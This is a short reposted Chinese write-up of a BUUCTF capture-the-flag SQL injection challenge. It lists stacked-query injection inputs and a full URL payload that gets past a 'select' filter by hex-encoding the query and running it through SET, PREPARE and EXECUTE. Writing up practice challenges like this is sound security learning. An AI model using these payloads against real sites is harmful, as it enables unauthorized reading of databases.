堆疊注入——BUUCTF-隨便注

本文轉載自查看原文 2019-09-07 13:47 509 ctf write up

由題目提示知道，這題需要進行sql注入

輸入1'發現報錯

再輸入1';show batabases#出現了一大堆數據庫

再輸入1';show tables#出現了兩個表

猜測flag在這2個表中，輸入1';show create table `1919810931114514`;嘗試打開表1，發現

因為select被過濾了，所以先將select * from `1919810931114514`進行16進制編碼

再通過構造payload，得http://677a0eb4-6c6d-4514-b3bb-eacb38a3a347.node1.buuoj.cn？inject=1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

進而得到flag

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 BUUCTF | [SUCTF 2019]EasySQL (堆疊注入) BUUCTF-文件包含 BUUCTF-不一樣的flag 1 buuctf-刮開有獎 buuctf-[網鼎杯 2018]Fakebook 1 BUUCTF-[極客大挑戰 2019]PHP 1 BUUCTF-[極客大挑戰 2019]HardSQL 1詳解 [強網杯 2019] 隨便注 SQL注入-堆疊注入（堆查詢注入） BUUCTF-SQL注入